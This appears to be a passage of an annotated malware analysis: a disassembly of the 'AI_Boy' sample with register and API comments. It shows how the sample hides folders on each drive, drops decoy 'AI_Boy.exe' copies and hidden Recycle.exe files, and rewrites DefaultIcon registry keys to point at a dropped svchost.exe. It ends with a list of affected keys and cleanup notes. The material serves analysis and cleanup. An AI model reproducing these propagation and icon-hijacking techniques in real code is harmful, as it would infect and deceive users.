00402246 |. 3BF4 ||cmp esi, esp
00402248 |. E8 73190000 ||call 00403BC0
0040224D |. 8BF4 ||mov esi, esp
0040224F |. 68 80000000 ||push 80 ; /FileAttributes = NORMAL
00402254 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858] ; |
0040225A |. 52 ||push edx ; |FileName = "X:\<dir> AI_Boy.exe"
0040225B |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402261 |. 3BF4 ||cmp esi, esp
00402263 |. E8 58190000 ||call 00403BC0
00402268 |. 8BF4 ||mov esi, esp
0040226A |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
0040226C |. 8D85 A4F6FFFF ||lea eax, dword ptr [ebp-95C] ; |
00402272 |. 50 ||push eax ; |FileName = "X:\<dir>" (original folder)
00402273 |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA: hide the original folder
00402279 |. 3BF4 ||cmp esi, esp
0040227B |. E8 40190000 ||call 00403BC0
00402280 |. 8BF4 ||mov esi, esp
00402282 |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
00402284 |. 8D8D A0F5FFFF ||lea ecx, dword ptr [ebp-A60] ; |
0040228A |. 51 ||push ecx ; |FileName = "...\Recycle.exe"
0040228B |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA
00402291 |. 3BF4 ||cmp esi, esp
00402293 |. E8 28190000 ||call 00403BC0
00402298 |> E9 6F010000 ||jmp 0040240C
0040229D |> 8BF4 ||mov esi, esp ; --- directory name longer than 100 chars: work on a truncated copy of the path
0040229F |. 8D95 DCF8FFFF ||lea edx, dword ptr [ebp-724]
004022A5 |. 52 ||push edx ; /<%s> = cFileName
004022A6 |. 8D85 F8FDFFFF ||lea eax, dword ptr [ebp-208] ; |
004022AC |. 50 ||push eax ; |<%s> = "X:\"
004022AD |. 68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
004022B2 |. 8D8D A8F7FFFF ||lea ecx, dword ptr [ebp-858] ; |
004022B8 |. 51 ||push ecx ; |s = ebp-858
004022B9 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA: ebp-858 = "X:\<dir>"
004022BF |. 83C4 10 ||add esp, 10
004022C2 |. 3BF4 ||cmp esi, esp
004022C4 |. E8 F7180000 ||call 00403BC0
004022C9 |. 8BF4 ||mov esi, esp
004022CB |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858]
004022D1 |. 52 ||push edx ; /<%s> = "X:\<dir>"
004022D2 |. 68 20E44200 ||push 0042E420 ; |Format = "%s."
004022D7 |. 8D85 98F3FFFF ||lea eax, dword ptr [ebp-C68] ; |
004022DD |. 50 ||push eax ; |s = ebp-C68
004022DE |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA: ebp-C68 = "X:\<dir>." (Win32 path normalisation usually strips a trailing '.', so this likely still names the original folder -- verify)
004022E4 |. 83C4 0C ||add esp, 0C
004022E7 |. 3BF4 ||cmp esi, esp
004022E9 |. E8 D2180000 ||call 00403BC0
004022EE |. 8D8D 98F3FFFF ||lea ecx, dword ptr [ebp-C68]
004022F4 |. 51 ||push ecx
004022F5 |. E8 0BEDFFFF ||call 00401005 ; same thunk as at 004020E5, now given the dotted path
004022FA |. 83C4 04 ||add esp, 4
004022FD |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858]
00402303 |. 52 ||push edx
00402304 |. E8 37180000 ||call 00403B40 ; (presumed strlen) of "X:\<dir>"
00402309 |. 83C4 04 ||add esp, 4
0040230C |. 83E8 6B ||sub eax, 6B ; n = len - 107
0040230F |. 50 ||push eax
00402310 |. 8D85 A8F7FFFF ||lea eax, dword ptr [ebp-858]
00402316 |. 50 ||push eax
00402317 |. 8D8D A4F6FFFF ||lea ecx, dword ptr [ebp-95C]
0040231D |. 51 ||push ecx
0040231E |. E8 1D170000 ||call 00403A40 ; cdecl(dst = ebp-95C, src = ebp-858, n); presumably strncpy -- TODO confirm
00402323 |. 83C4 0C ||add esp, 0C
00402326 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858]
0040232C |. 52 ||push edx
0040232D |. E8 0E180000 ||call 00403B40 ; (presumed strlen) again
00402332 |. 83C4 04 ||add esp, 4
00402335 |. C68405 39F6FF>||mov byte ptr [ebp+eax-9C7], 0 ; ebp-95C + (len - 0x6B): NUL-terminate, so ebp-95C = first len-107 chars of "X:\<dir>"
0040233D |. 8BF4 ||mov esi, esp
0040233F |. 8D85 A4F6FFFF ||lea eax, dword ptr [ebp-95C]
00402345 |. 50 ||push eax ; /<%s> = truncated path
00402346 |. 68 A0E34200 ||push 0042E3A0 ; |Format = "%s AI_Boy.exe"
0040234B |. 8D8D 9CF4FFFF ||lea ecx, dword ptr [ebp-B64] ; |
00402351 |. 51 ||push ecx ; |s = ebp-B64
00402352 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA: ebp-B64 = "<truncated> AI_Boy.exe"
00402358 |. 83C4 0C ||add esp, 0C
0040235B |. 3BF4 ||cmp esi, esp
0040235D |. E8 5E180000 ||call 00403BC0
00402362 |. 8BF4 ||mov esi, esp
00402364 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858]
0040236A |. 52 ||push edx ; /<%s> = "X:\<dir>"
0040236B |. 68 28E44200 ||push 0042E428 ; |Format = "%s\Recycle.exe"
00402370 |. 8D85 A0F5FFFF ||lea eax, dword ptr [ebp-A60] ; |
00402376 |. 50 ||push eax ; |s = ebp-A60
00402377 |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA: ebp-A60 = "X:\<dir>\Recycle.exe"
0040237D |. 83C4 0C ||add esp, 0C
00402380 |. 3BF4 ||cmp esi, esp
00402382 |. E8 39180000 ||call 00403BC0
00402387 |. 8BF4 ||mov esi, esp
00402389 |. 6A 00 ||push 0 ; /FailIfExists = FALSE
0040238B |. 8D8D 9CF4FFFF ||lea ecx, dword ptr [ebp-B64] ; |
00402391 |. 51 ||push ecx ; |NewFileName = "<truncated> AI_Boy.exe"
00402392 |. 68 301A4300 ||push 00431A30 ; |ExistingFileName = "C:\WINDOWS\svchost.exe"
00402397 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
0040239D |. 3BF4 ||cmp esi, esp
0040239F |. E8 1C180000 ||call 00403BC0
004023A4 |. 8BF4 ||mov esi, esp
004023A6 |. 6A 00 ||push 0 ; /FailIfExists = FALSE
004023A8 |. 8D95 A0F5FFFF ||lea edx, dword ptr [ebp-A60] ; |
004023AE |. 52 ||push edx ; |NewFileName = "X:\<dir>\Recycle.exe"
004023AF |. 68 341B4300 ||push 00431B34 ; |ExistingFileName = "C:\WINDOWS\system\svchost.exe"
004023B4 |. FF15 18844300 ||call dword ptr [<&KERNEL32.CopyFile>; \CopyFileA
004023BA |. 3BF4 ||cmp esi, esp
004023BC |. E8 FF170000 ||call 00403BC0
004023C1 |. 8BF4 ||mov esi, esp
004023C3 |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004023C5 |. 8D85 98F3FFFF ||lea eax, dword ptr [ebp-C68] ; |
004023CB |. 50 ||push eax ; |FileName = "X:\<dir>."
004023CC |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA: hide the folder
004023D2 |. 3BF4 ||cmp esi, esp
004023D4 |. E8 E7170000 ||call 00403BC0
004023D9 |. 8BF4 ||mov esi, esp
004023DB |. 6A 06 ||push 6 ; /FileAttributes = HIDDEN|SYSTEM
004023DD |. 8D8D A0F5FFFF ||lea ecx, dword ptr [ebp-A60] ; |
004023E3 |. 51 ||push ecx ; |FileName = "X:\<dir>\Recycle.exe"
004023E4 |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA: hide Recycle.exe
004023EA |. 3BF4 ||cmp esi, esp
004023EC |. E8 CF170000 ||call 00403BC0
004023F1 |. 8BF4 ||mov esi, esp
004023F3 |. 68 80000000 ||push 80 ; /FileAttributes = NORMAL
004023F8 |. 8D95 9CF4FFFF ||lea edx, dword ptr [ebp-B64] ; |
004023FE |. 52 ||push edx ; |FileName = "<truncated> AI_Boy.exe"
004023FF |. FF15 C4834300 ||call dword ptr [<&KERNEL32.SetFileA>; \SetFileAttributesA: decoy stays visible
00402405 |. 3BF4 ||cmp esi, esp
00402407 |. E8 B4170000 ||call 00403BC0
0040240C |> E9 CC000000 ||jmp 004024DD
00402411 |> 8D85 DCF8FFFF ||lea eax, dword ptr [ebp-724] ; --- non-directory entry
00402417 |. 50 ||push eax
00402418 |. E8 23170000 ||call 00403B40 ; (presumed strlen) of cFileName
0040241D |. 83C4 04 ||add esp, 4
00402420 |. 83F8 64 ||cmp eax, 64
00402423 |. 0F87 B4000000 ||ja 004024DD ; file name longer than 100 chars -> skip
00402429 |. 8BF4 ||mov esi, esp
0040242B |. 8D8D DCF8FFFF ||lea ecx, dword ptr [ebp-724]
00402431 |. 51 ||push ecx ; /<%s> = cFileName
00402432 |. 68 9CE34200 ||push 0042E39C ; |Format = "%s"
00402437 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858] ; |
0040243D |. 52 ||push edx ; |s = ebp-858
0040243E |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA: ebp-858 = bare file name
00402444 |. 83C4 0C ||add esp, 0C
00402447 |. 3BF4 ||cmp esi, esp
00402449 |. E8 72170000 ||call 00403BC0
0040244E |. 8BF4 ||mov esi, esp
00402450 |. 8D85 DCF8FFFF ||lea eax, dword ptr [ebp-724]
00402456 |. 50 ||push eax ; /<%s> = cFileName
00402457 |. 8D8D F8FDFFFF ||lea ecx, dword ptr [ebp-208] ; |
0040245D |. 51 ||push ecx ; |<%s> = "X:\"
0040245E |. 68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
00402463 |. 8D95 A4F6FFFF ||lea edx, dword ptr [ebp-95C] ; |
00402469 |. 52 ||push edx ; |s = ebp-95C
0040246A |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA: ebp-95C = "X:\<file>"
00402470 |. 83C4 10 ||add esp, 10
00402473 |. 3BF4 ||cmp esi, esp
00402475 |. E8 46170000 ||call 00403BC0
0040247A |. 8D85 A8F7FFFF ||lea eax, dword ptr [ebp-858]
00402480 |. 50 ||push eax
00402481 |. E8 BA160000 ||call 00403B40 ; (presumed strlen) of the file name
00402486 |. 83C4 04 ||add esp, 4
00402489 |. 0FBE8C05 A5F7>||movsx ecx, byte ptr [ebp+eax-85B] ; name[len-3]
00402491 |. 83F9 65 ||cmp ecx, 65 ; 'e'
00402494 |. 75 47 ||jnz short 004024DD
00402496 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858]
0040249C |. 52 ||push edx
0040249D |. E8 9E160000 ||call 00403B40
004024A2 |. 83C4 04 ||add esp, 4
004024A5 |. 0FBE8405 A6F7>||movsx eax, byte ptr [ebp+eax-85A] ; name[len-2]
004024AD |. 83F8 78 ||cmp eax, 78 ; 'x'
004024B0 |. 75 2B ||jnz short 004024DD
004024B2 |. 8D8D A8F7FFFF ||lea ecx, dword ptr [ebp-858]
004024B8 |. 51 ||push ecx
004024B9 |. E8 82160000 ||call 00403B40
004024BE |. 83C4 04 ||add esp, 4
004024C1 |. 0FBE9405 A7F7>||movsx edx, byte ptr [ebp+eax-859] ; name[len-1]
004024C9 |. 83FA 65 ||cmp edx, 65 ; 'e' -> only a lowercase "exe" suffix matches; "EXE" does not
004024CC |. 75 0F ||jnz short 004024DD
004024CE |. 8D85 A4F6FFFF ||lea eax, dword ptr [ebp-95C]
004024D4 |. 50 ||push eax
004024D5 |. E8 30EBFFFF ||call 0040100A ; thunk given "X:\<file>"; target not in this listing, so what happens to root-level *exe files is not visible here
004024DA |. 83C4 04 ||add esp, 4
004024DD |>^ E9 56FBFFFF |\jmp 00402038 ; next entry on this drive
004024E2 |> 8BF4 |mov esi, esp
004024E4 |. 8B8D ACF8FFFF |mov ecx, dword ptr [ebp-754]
004024EA |. 51 |push ecx ; /hSearch
004024EB |. FF15 C0834300 |call dword ptr [<&KERNEL32.FindClose>; \FindClose
004024F1 |. 3BF4 |cmp esi, esp
004024F3 |. E8 C8160000 |call 00403BC0
004024F8 |.^ E9 83FAFFFF \jmp 00401F80 ; next drive
004024FD |> 5F pop edi ; epilogue
004024FE |. 5E pop esi
004024FF |. 5B pop ebx
00402500 |. 81C4 A80C0000 add esp, 0CA8
00402506 |. 3BEC cmp ebp, esp
00402508 |. E8 B3160000 call 00403BC0 ; final frame check
0040250D |. 8BE5 mov esp, ebp
0040250F |. 5D pop ebp
00402510 \. C3 retn ; eax is not set up as a return value
7.修改注册表,修改文件默认图标 (routine at 00403430, argument = a CLSID string; the listing below is cut off before its return). It opens HKCR\CLSID\<clsid>\DefaultIcon with access mask 0x2001F = KEY_READ|KEY_WRITE — on an HKLM-backed HKCR key that requires administrative rights — and writes "C:\WINDOWS\system\svchost.exe,0" (REG_EXPAND_SZ) as the default value, so Explorer now takes the icon from the dropped file. It then reads the default value of HKCR\CLSID\<clsid> (the RegQueryValueExA at 00403564 reads that key's default value, not "other file formats"), appends ".AI_Boy" and writes it back as REG_SZ — that suffix is a usable cleanup marker. Two sloppiness points worth noting for anyone re-analysing: the RegOpenKeyExA return value is never tested before RegSetValueExA, and the pBufSize dword at ebp-318 passed to RegQueryValueExA is not initialised anywhere in the visible code (it still holds the 0xCC frame fill), so the function trusts a bogus buffer size.
00403430 /> \55 push ebp
00403431 |. 8BEC mov ebp, esp
00403433 |. 81EC 60050000 sub esp, 560
00403439 |. 53 push ebx
0040343A |. 56 push esi
0040343B |. 57 push edi
0040343C |. 8DBD A0FAFFFF lea edi, dword ptr [ebp-560]
00403442 |. B9 58010000 mov ecx, 158
00403447 |. B8 CCCCCCCC mov eax, CCCCCCCC
0040344C |. F3:AB rep stos dword ptr es:[edi]
0040344E |. 8BF4 mov esi, esp
00403450 |. 68 341B4300 push 00431B34 ; /<%s> = "C:\WINDOWS\system\svchost.exe"
00403455 |. 68 84E74200 push 0042E784 ; |Format = "%s,0"
0040345A |. 8D85 F4FDFFFF lea eax, dword ptr [ebp-20C] ; |
00403460 |. 50 push eax ; |s
00403461 |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00403467 |. 83C4 0C add esp, 0C
0040346A |. 3BF4 cmp esi, esp
0040346C |. E8 4F070000 call 00403BC0
00403471 |. 8BF4 mov esi, esp
00403473 |. 8B4D 08 mov ecx, dword ptr [ebp+8]
00403476 |. 51 push ecx ; /<%s>
00403477 |. 68 68E74200 push 0042E768 ; |Format = "CLSID\%s\DefaultIcon"
0040347C |. 8D95 F8FEFFFF lea edx, dword ptr [ebp-108] ; |
00403482 |. 52 push edx ; |s
00403483 |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00403489 |. 83C4 0C add esp, 0C
0040348C |. 3BF4 cmp esi, esp
0040348E |. E8 2D070000 call 00403BC0
00403493 |. 8BF4 mov esi, esp
00403495 |. 8D45 FC lea eax, dword ptr [ebp-4]
00403498 |. 50 push eax ; /pHandle
00403499 |. 68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
0040349E |. 6A 00 push 0 ; |Reserved = 0
004034A0 |. 8D8D F8FEFFFF lea ecx, dword ptr [ebp-108] ; |
004034A6 |. 51 push ecx ; |Subkey
004034A7 |. 68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
004034AC |. FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
004034B2 |. 3BF4 cmp esi, esp
004034B4 |. E8 07070000 call 00403BC0
004034B9 |. 8D95 F4FDFFFF lea edx, dword ptr [ebp-20C]
004034BF |. 52 push edx
004034C0 |. E8 7B060000 call 00403B40
004034C5 |. 83C4 04 add esp, 4
004034C8 |. 8BF4 mov esi, esp
004034CA |. 50 push eax ; /BufSize
004034CB |. 8D85 F4FDFFFF lea eax, dword ptr [ebp-20C] ; |
004034D1 |. 50 push eax ; |Buffer
004034D2 |. 6A 02 push 2 ; |ValueType = REG_EXPAND_SZ
004034D4 |. 6A 00 push 0 ; |Reserved = 0
004034D6 |. 6A 00 push 0 ; |ValueName = NULL
004034D8 |. 8B4D FC mov ecx, dword ptr [ebp-4] ; |
004034DB |. 51 push ecx ; |hKey
004034DC |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \修改注册表破坏文件图标指向C:\WINDOWS\system\svchost.exe
004034E2 |. 3BF4 cmp esi, esp
004034E4 |. E8 D7060000 call 00403BC0
004034E9 |. 8BF4 mov esi, esp
004034EB |. 8B55 FC mov edx, dword ptr [ebp-4]
004034EE |. 52 push edx ; /hKey
004034EF |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
004034F5 |. 3BF4 cmp esi, esp
004034F7 |. E8 C4060000 call 00403BC0
004034FC |. 8BF4 mov esi, esp
004034FE |. 8B45 08 mov eax, dword ptr [ebp+8]
00403501 |. 50 push eax ; /<%s>
00403502 |. 68 5CE74200 push 0042E75C ; |Format = "CLSID\%s"
00403507 |. 8D8D E4FBFFFF lea ecx, dword ptr [ebp-41C] ; |
0040350D |. 51 push ecx ; |s
0040350E |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00403514 |. 83C4 0C add esp, 0C
00403517 |. 3BF4 cmp esi, esp
00403519 |. E8 A2060000 call 00403BC0
0040351E |. 8BF4 mov esi, esp
00403520 |. 8D95 F0FDFFFF lea edx, dword ptr [ebp-210]
00403526 |. 52 push edx ; /pHandle
00403527 |. 68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
0040352C |. 6A 00 push 0 ; |Reserved = 0
0040352E |. 8D85 E4FBFFFF lea eax, dword ptr [ebp-41C] ; |
00403534 |. 50 push eax ; |Subkey
00403535 |. 68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
0040353A |. FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00403540 |. 3BF4 cmp esi, esp
00403542 |. E8 79060000 call 00403BC0
00403547 |. 8BF4 mov esi, esp
00403549 |. 8D8D E8FCFFFF lea ecx, dword ptr [ebp-318]
0040354F |. 51 push ecx ; /pBufSize
00403550 |. 8D95 ECFCFFFF lea edx, dword ptr [ebp-314] ; |
00403556 |. 52 push edx ; |Buffer
00403557 |. 6A 00 push 0 ; |pValueType = NULL
00403559 |. 6A 00 push 0 ; |Reserved = NULL
0040355B |. 6A 00 push 0 ; |ValueName = NULL
0040355D |. 8B85 F0FDFFFF mov eax, dword ptr [ebp-210] ; |
00403563 |. 50 push eax ; |hKey
00403564 |. FF15 7C834300 call dword ptr [<&ADVAPI32.RegQueryVa>; \查询其余文件格式
0040356A |. 3BF4 cmp esi, esp
0040356C |. E8 4F060000 call 00403BC0
00403571 |. 8BF4 mov esi, esp
00403573 |. 8D8D ECFCFFFF lea ecx, dword ptr [ebp-314]
00403579 |. 51 push ecx ; /<%s>
0040357A |. 68 50E74200 push 0042E750 ; |Format = "%s.AI_Boy"
0040357F |. 8D95 E0FAFFFF lea edx, dword ptr [ebp-520] ; |
00403585 |. 52 push edx ; |s
00403586 |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
0040358C |. 83C4 0C add esp, 0C
0040358F |. 3BF4 cmp esi, esp
00403591 |. E8 2A060000 call 00403BC0
00403596 |. 8D85 E0FAFFFF lea eax, dword ptr [ebp-520]
0040359C |. 50 push eax
0040359D |. E8 9E050000 call 00403B40
004035A2 |. 83C4 04 add esp, 4
004035A5 |. 8BF4 mov esi, esp
004035A7 |. 50 push eax ; /BufSize
004035A8 |. 8D8D E0FAFFFF lea ecx, dword ptr [ebp-520] ; |
004035AE |. 51 push ecx ; |Buffer
004035AF |. 6A 01 push 1 ; |ValueType = REG_SZ
004035B1 |. 6A 00 push 0 ; |Reserved = 0
004035B3 |. 6A 00 push 0 ; |ValueName = NULL
004035B5 |. 8B95 F0FDFFFF mov edx, dword ptr [ebp-210] ; |
004035BB |. 52 push edx ; |hKey
004035BC |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \相同方法操作
004035C2 |. 3BF4 cmp esi, esp
004035C4 |. E8 F7050000 call 00403BC0
004035C9 |. 8BF4 mov esi, esp
004035CB |. 8B85 F0FDFFFF mov eax, dword ptr [ebp-210]
004035D1 |. 50 push eax ; /hKey
004035D2 |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
0040322C |> \68 08E64200 push 0042E608 ; ASCII "{645FF040-5081-101B-9F08-00AA002F954E}"
00403231 |. E8 15DEFFFF call 0040104B
00403236 |. 83C4 04 add esp, 4
00403239 |. 68 D8E54200 push 0042E5D8 ; ASCII "{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
0040323E |. E8 08DEFFFF call 0040104B
00403243 |. 83C4 04 add esp, 4
00403246 |. 68 A8E54200 push 0042E5A8 ; ASCII "{450D8FbA-AD25-11D0-98A8-0800361B1103}"
0040324B |. E8 FBDDFFFF call 0040104B
00403250 |. 83C4 04 add esp, 4
00403253 |. 68 78E54200 push 0042E578 ; ASCII "{208D2C60-3AEA-1069-A2D7-08002B30309D}"
00403258 |. E8 EEDDFFFF call 0040104B
0040325D |. 83C4 04 add esp, 4
00403260 |. 68 48E54200 push 0042E548 ; ASCII "{871C5380-42A0-1069-A2EA-08002B30309D}"
00403265 |. E8 E1DDFFFF call 0040104B
具体修改了以下 (these paths were presumably recorded with a registry monitor — the disassembly above only shows the five CLSIDs being passed to 0040104B; the ProgID DefaultIcon keys are not visible in the listing. Writes made through HKCR land in HKLM\SOFTWARE\Classes, which is why they show up under HKLM. Entries that were listed twice in the original post have been merged):
HKLM\SOFTWARE\Classes\batfile\DefaultIcon
HKLM\SOFTWARE\Classes\cmdfile\DefaultIcon
HKLM\SOFTWARE\Classes\comfile\DefaultIcon
HKLM\SOFTWARE\Classes\dllfile\DefaultIcon
HKLM\SOFTWARE\Classes\inffile\DefaultIcon
HKLM\SOFTWARE\Classes\regfile\DefaultIcon
HKLM\SOFTWARE\Classes\txtfile\DefaultIcon
HKLM\SOFTWARE\Classes\chm.file\DefaultIcon
HKLM\SOFTWARE\Classes\Excel.CSV\DefaultIcon
HKLM\SOFTWARE\Classes\exefile\DefaultIcon
HKLM\SOFTWARE\Classes\icofile\DefaultIcon
HKLM\SOFTWARE\Classes\jpegfile\DefaultIcon
HKLM\SOFTWARE\Classes\Paint.Picture\DefaultIcon
HKLM\SOFTWARE\Classes\PowerPoint.Show.8\DefaultIcon
HKLM\SOFTWARE\Classes\SoundRec\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.acc\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.mp4\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rm\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rmvb\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon
HKLM\SOFTWARE\Classes\Word.Document.8\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\DefaultIcon (shell-namespace CLSID, commonly documented as My Network Places)
HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon (commonly documented as My Computer)
HKLM\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\DefaultIcon (commonly documented as My Documents)
HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon (commonly documented as Recycle Bin)
HKLM\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\DefaultIcon (commonly documented as Internet Explorer)
Cleanup note: every DefaultIcon above now points at C:\WINDOWS\system\svchost.exe,0; restoring them needs the original values from a clean system, and the CLSID keys' default values additionally carry the ".AI_Boy" suffix written by the routine at 00403430.